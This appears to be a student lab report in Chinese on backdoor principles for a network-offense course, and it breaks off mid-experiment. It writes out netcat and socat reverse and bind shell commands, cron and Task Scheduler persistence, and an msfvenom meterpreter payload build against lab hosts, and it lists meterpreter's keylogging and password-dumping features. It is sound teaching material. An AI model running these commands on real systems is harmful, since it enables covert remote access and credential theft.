《网络对抗》Exp2 后门原理与实践
基础问题回答
·例举你能想到的一个后门进入到你系统中的可能方式?
在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;浏览网页的时候,点的一些小广告可能会被植入后门。
·例举你知道的后门如何启动起来(win及linux)的方式?
Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动;Linux下可以通过cron来启动。
·Meterpreter有哪些给你映像深刻的功能?
直接通过指令获取主机的摄像头有点6,有点像电影里的黑客;获取击键记录也能得到很多信息,比如登录什么网站的密码,或者说和某人的重要聊天记录之类的,都非常容易被人窃取到进行分析;导出密码文件功能简直是有点无解,这样一来你的电脑相当于是透明的;后门进程的迁移,这样即使有管理员去查看运行的进程也很难发现后门的存在;使用后渗透攻击模块POST可以对主机进行更深入的攻击。
·如何发现自己有系统有没有被安装后门?
没有经过免杀处理的后门程序可能很容易就被杀毒工具扫出来,不过一般现在这样的后门也很少了;检查防火墙开启的端口和它对应的进程,如果不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析;下载专门的监控软件,对操作系统中的进程进行监控,看是否存在异常。
实践过程
用nc获取远程主机的Shell
linux ip:
windows ip:
·linux获取windows的shell
1.在kali下使用命令nc -l -p 5338对端口5338开始监听
2.下载老师的附件ncat.rar,解压后放在一个可以找到路径的文件夹下
在windows的cmd下输入ncat.exe -e cmd.exe 192.168.19.128 5338 实现Windows反弹连接Linux
3.Kali下可以看到Windows的命令提示,可以输入Windows命令:
windows获取linux的shell
1.windows 打开监听,端口为5338,ncat.exe -l -p 5338
2.Linux进行反弹连接win
3.windows下获得一个linux shell,运行ls
cron启动
·使用crontab -e修改配置文件,根据格式m h dom mon dow user command来填写启动的时间
·使用crontab -l查看配置文件
kali系统内每分钟自动运行指令,反弹至pc端的5338端口
使用socat获取主机操作Shell
1.linux上用socat tcp-listen:5338把cmd绑定到端口5338
2.socat tcp-l:5338 system:bash,pty,stderrlinux反弹连接win
3.windows使用socat readline tcp:192.168.19.128:5338开启监听,监听成功后可进行任何操作,此处执行ls
任务计划启动
1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
2.在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5338 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5338,同时把cmd.exe的stderr重定向到stdout上:
3.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
4.此时,在Kali环境下输入指令socat - tcp:192.168.199.153:5338,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5338端口,此时可以发现已经成功获得了一个cmd shell:
Meterpreter
3.1 生成20145338.exe
·输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.153 LPORT=5338 -f exe > 20145338.exe
生成后门程序:
·通过nc指令将生成的后门程序传送到Windows主机上:
·在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
·设置完成后,执行监听:
·接下来应该是要打开Windows上的后门程序,可是我拷不了我的exe从我的虚拟机到我的主机。。。。。
